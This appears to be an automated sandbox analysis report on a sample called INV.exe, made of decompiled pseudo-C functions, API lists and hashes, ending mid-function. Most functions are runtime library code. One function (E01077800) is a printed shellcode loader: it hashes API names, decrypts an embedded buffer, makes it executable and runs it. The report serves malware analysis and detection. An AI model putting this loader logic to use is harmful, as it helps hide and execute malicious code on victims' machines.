                                        • String ID: X&A$h&A
                                        • API String ID: 3903695350-2460073903
                                        • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction ID: c89599ffa752a7419cc6ed1d924e3923b80d600b097e28779840c888ba2b925a
                                        • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction Fuzzy Hash: EB319E71A08602DFEB71BA78D844B9BB7F8BF10310F114A69E4D9D7190EF32E8958B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: INV.exe PID: 1740 Parent PID: 7140 INV.exeCOMMON

                                        Executed Functions

                                        Non-executed Functions

                                        Function 0106E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
					if(E0106DB06(_t28, ?str?) != 0) {
						return E0106FA26(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                        0x0106e852
                                        0x0106e857
                                        0x0106e87f
                                        0x00000000
                                        0x0106e8a8
                                        0x0106e89a
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e89c
                                        0x0106e8c4
                                        0x00000000
                                        0x00000000
                                        0x0106e8ca
                                        0x0106e8cf
                                        0x0106e8d3
                                        0x0106e8d3
                                        0x0106e8a1

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01077800, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				intOrPtr* _t40;
				intOrPtr* _t43;
				intOrPtr* _t48;
				void* _t49;
				signed char _t50;
				intOrPtr* _t56;
				void* _t85;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
				 *_t43( *_t40(0));
				_t18 =  &_v40; // 0x72637052
				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(2, 0, 1, 0,  &_v12);
				_t87 = 0;
				if(_t49 != 0 && _t49 == 0x57) {
					_t50 = 0;
					do {
						_t20 = 0x107f0d0 + _t50; // 0xcbf195bd
						asm("rol dl, 0x2");
						asm("ror dl, 0x3");
						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
						_t50 = _t50 + 1;
					} while (_t50 < 0x1e05);
					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16);
					_v8(0x107f0d0, 0x1080ed8, 0, 0, 0);
					return E01077D10(_t87);
				}
				return _t49;
			}























                                        0x01077809
                                        0x01077810
                                        0x01077817
                                        0x0107781d
                                        0x01077821
                                        0x01077828
                                        0x0107782f
                                        0x01077835
                                        0x01077858
                                        0x0107785a
                                        0x0107786c
                                        0x01077889
                                        0x01077890
                                        0x0107789d
                                        0x010778a9
                                        0x010778ab
                                        0x010778b8
                                        0x010778cb
                                        0x010778cd
                                        0x010778d2
                                        0x010778d9
                                        0x010778e0
                                        0x010778e0
                                        0x010778ec
                                        0x010778f4
                                        0x0107790e
                                        0x01077914
                                        0x01077915
                                        0x0107792c
                                        0x01077942
                                        0x00000000
                                        0x01077945
                                        0x0107794d

                                        APIs
                                        • VirtualProtect.KERNEL32(0107F0D0,00001E05,00000040,?), ref: 0107792C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 544645111-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068E85, Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E010632EE(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E010632EE(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E010632EE(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E0106899A( *_t42, 0x107e2e8);
								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E010632B6();
									E0106363B( *_t42);
									E010634E1( *_t42);
									E010632B6(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E01063D75(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E010632B6( *_t42);
							E010632B6(_t42);
							L8:
							goto L3;
						}
						E010632B6(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
					goto L4;
				}
			}











                                        0x01068e8e
                                        0x01068eb4
                                        0x00000000
                                        0x01068e96
                                        0x01068ea1
                                        0x01068ea5
                                        0x01068ea7
                                        0x01068ec0
                                        0x01068ec5
                                        0x01068ec9
                                        0x01068ecb
                                        0x01068edc
                                        0x01068ee1
                                        0x01068ee6
                                        0x01068ee8
                                        0x01068f01
                                        0x01068f0e
                                        0x01068f16
                                        0x01068f19
                                        0x01068f1b
                                        0x01068f30
                                        0x01068f30
                                        0x01068f37
                                        0x01068f3e
                                        0x01068f44
                                        0x01068f4c
                                        0x01068f55
                                        0x00000000
                                        0x01068f55
                                        0x01068f1f
                                        0x01068f22
                                        0x01068f29
                                        0x01068f2b
                                        0x01068f53
                                        0x00000000
                                        0x01068f53
                                        0x01068f2d
                                        0x00000000
                                        0x01068f2d
                                        0x01068eec
                                        0x01068ef2
                                        0x01068ed3
                                        0x00000000
                                        0x01068ed3
                                        0x01068ece
                                        0x00000000
                                        0x01068ece
                                        0x01068ea9
                                        0x01068eae
                                        0x00000000
                                        0x01068eae

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106197C, Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E0106197C(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10c1b34);
				_t25 =  *0x10bfcfc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E010632B6( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x10bfcfc; // 0x0
				}
				_push(_t14);
				E010632B6(_t25);
				_t26 =  *0x10bfcf8; // 0x0
				 *0x10bfcfc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E010632B6( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10bfcf8; // 0x0
				}
				E010632B6(_t26);
				 *0x10bfcf8 = 0;
				E010632B6( *0x10bfcf4);
				_t5 = E010632B6( *0x10bfcf0);
				_t27 = _t26 | 0xffffffff;
				 *0x10bfcf4 = 0;
				 *0x10bfcf0 = 0;
				if(_t24 != _t27 &&  *0x10c1b34 != 0) {
					_t5 = E010632B6(_t24);
				}
				__imp__EncodePointer(_t27);
				 *0x10c1b34 = _t5;
				_t6 =  *0x10c06f4;
				if( *0x10c06f4 != 0) {
					E010632B6(_t6);
					 *0x10c06f4 = 0;
				}
				_t7 =  *0x10c06f8;
				if( *0x10c06f8 != 0) {
					E010632B6(_t7);
					 *0x10c06f8 = 0;
				}
				_t8 =  *0x107e7d4; // 0x107e5b0
				asm("lock xadd [eax], esi");
				if(_t27 == 1) {
					_t8 =  *0x107e7d4; // 0x107e5b0
					if(_t8 != 0x107e5b0) {
						_t9 = E010632B6(_t8);
						 *0x107e7d4 = 0x107e5b0;
						return _t9;
					}
				}
				return _t8;
			}











                                        0x0106197c
                                        0x01061984
                                        0x0106198a
                                        0x01061990
                                        0x01061994
                                        0x01061996
                                        0x0106199d
                                        0x010619a3
                                        0x010619a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619a6
                                        0x010619a8
                                        0x010619a8
                                        0x010619ae
                                        0x010619b0
                                        0x010619b5
                                        0x010619bd
                                        0x010619c6
                                        0x010619c8
                                        0x010619ce
                                        0x010619d4
                                        0x010619d7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619d7
                                        0x010619d9
                                        0x010619d9
                                        0x010619e0
                                        0x010619eb
                                        0x010619f1
                                        0x010619fc
                                        0x01061a01
                                        0x01061a04
                                        0x01061a0d
                                        0x01061a15
                                        0x01061a20
                                        0x01061a25
                                        0x01061a27
                                        0x01061a2d
                                        0x01061a32
                                        0x01061a39
                                        0x01061a3c
                                        0x01061a42
                                        0x01061a42
                                        0x01061a48
                                        0x01061a4f
                                        0x01061a52
                                        0x01061a58
                                        0x01061a58
                                        0x01061a5e
                                        0x01061a63
                                        0x01061a69
                                        0x01061a6b
                                        0x01061a77
                                        0x01061a7a
                                        0x01061a80
                                        0x00000000
                                        0x01061a80
                                        0x01061a77
                                        0x01061a88

                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(00000000), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068F5C, Relevance: 15.1, APIs: 10, Instructions: 131COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E0106551B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01064112(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x107cf88);
					E010627F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E010615FE();
						_v36 = _t88;
						E010636DB(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E010632EE(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E01063117(0xc);
							_v8 = 1;
							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E010690D1();
							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0106363B(_t83);
								_t43 = E010634E1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E0106DB06(_a8, 0x107e17c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x10c0a44 = 1;
									}
								}
								E01063117(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0106375B(_t25, _t83);
								E0106363B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x107ecf4 & 0x00000001;
									if(( *0x107ecf4 & 0x00000001) == 0) {
										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x107e2e4; // 0x107e2e8
										_t32 = _t77 + 0x84; // 0x107ed00
										 *0x107ecf8 =  *_t32;
										_t33 = _t77 + 0x90; // 0x1079570
										 *0x107ed54 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x107e178 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E010690E0();
							}
						}
						_v8 = 0xfffffffe;
						E01069113(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
						E010640E7();
						_t45 = 0;
					}
					return E01062835(_t45);
				}
				L20:
			}

















                                        0x01068f5c
                                        0x01068f5f
                                        0x01068f62
                                        0x01068f63
                                        0x01068f68
                                        0x01068f8c
                                        0x01068f8f
                                        0x01068f6a
                                        0x01068f6a
                                        0x01068f6b
                                        0x01068f6e
                                        0x01068f6e
                                        0x01068f79
                                        0x01068f7e
                                        0x01068f83
                                        0x00000000
                                        0x00000000
                                        0x01068f85
                                        0x01068f89
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f89
                                        0x01068f90
                                        0x01068f91
                                        0x01068f92
                                        0x01068f93
                                        0x01068f94
                                        0x01068f95
                                        0x01068f9a
                                        0x01068f9b
                                        0x01068f9d
                                        0x01068fa2
                                        0x01068fa7
                                        0x01068fa9
                                        0x01068fac
                                        0x01068fb0
                                        0x01068fce
                                        0x01068fd0
                                        0x01068fd3
                                        0x01068fd8
                                        0x01068fdc
                                        0x01068fed
                                        0x01068fef
                                        0x01068ff2
                                        0x01068ff4
                                        0x01068ffc
                                        0x01069002
                                        0x0106900d
                                        0x01069014
                                        0x01069018
                                        0x0106902c
                                        0x0106902e
                                        0x01069031
                                        0x01069033
                                        0x010690ec
                                        0x010690f2
                                        0x01069039
                                        0x01069039
                                        0x0106903d
                                        0x01069047
                                        0x0106904e
                                        0x01069050
                                        0x01069052
                                        0x01069052
                                        0x01069050
                                        0x0106905e
                                        0x01069064
                                        0x0106906b
                                        0x01069070
                                        0x01069076
                                        0x0106907e
                                        0x01069082
                                        0x01069084
                                        0x0106908b
                                        0x01069095
                                        0x0106909c
                                        0x010690a2
                                        0x010690a8
                                        0x010690ad
                                        0x010690b3
                                        0x010690b8
                                        0x010690bb
                                        0x010690bb
                                        0x0106908b
                                        0x010690c0
                                        0x010690c4
                                        0x010690c4
                                        0x01069033
                                        0x010690f9
                                        0x01069100
                                        0x01069105
                                        0x01068fb2
                                        0x01068fb7
                                        0x01068fbd
                                        0x01068fc2
                                        0x01068fc2
                                        0x0106910c
                                        0x0106910c
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        • Opcode ID: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction ID: 7e6ceb9876812edad1a307fdf46b70e193b28217f6050780d6eb8bdb4e589736
                                        • Opcode Fuzzy Hash: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction Fuzzy Hash: 9D41E632904306EFEB20AFA8D941BDD7BF9BF14314F10846EFA98AB181DB765541CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010617CB, Relevance: 15.1, APIs: 10, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E01062D64(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E01063336(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E01064175(GetLastError());
						E010632B6( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E01064175(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E01064196(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E010640E7();
				_t9 = _t34;
				goto L14;
			}

















                                        0x010617cb
                                        0x010617ce
                                        0x010617d0
                                        0x010617d3
                                        0x010617d6
                                        0x010617ee
                                        0x010617f1
                                        0x010617f3
                                        0x00000000
                                        0x00000000
                                        0x010617f5
                                        0x010617fa
                                        0x010617fc
                                        0x010617fe
                                        0x01061804
                                        0x01061806
                                        0x0106180a
                                        0x0106180a
                                        0x0106180a
                                        0x01061806
                                        0x01061814
                                        0x01061818
                                        0x0106181e
                                        0x01061821
                                        0x01061823
                                        0x01061839
                                        0x0106183e
                                        0x01061841
                                        0x01061843
                                        0x00000000
                                        0x00000000
                                        0x01061851
                                        0x01061857
                                        0x01061859
                                        0x01061876
                                        0x01061876
                                        0x00000000
                                        0x01061876
                                        0x01061862
                                        0x01061869
                                        0x0106186e
                                        0x00000000
                                        0x01061825
                                        0x0106182c
                                        0x01061831
                                        0x01061832
                                        0x01061832
                                        0x01061877
                                        0x0106187c
                                        0x0106187c
                                        0x01061823
                                        0x010617d8
                                        0x010617d8
                                        0x010617df
                                        0x010617e0
                                        0x010617e2
                                        0x010617e7
                                        0x00000000

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp Download File
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction ID: d2bf931f15f0fea34c8563e5625d018a8aa35bb41f1268d121ebd0bfd51566b2
                                        • Opcode Fuzzy Hash: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction Fuzzy Hash: 71110DB1A04206FFEB726FB49C48A7E7BECEF54661B208569F9D5D5181EB35C800C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061DCF, Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x107cd50);
				E010627F0(__ebx, __edi, __esi);
				E01063117(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E010632EE();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x10bfd20 = _t82;
					 *0x10c1b28 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x10bfd20; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0x10bfd20 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
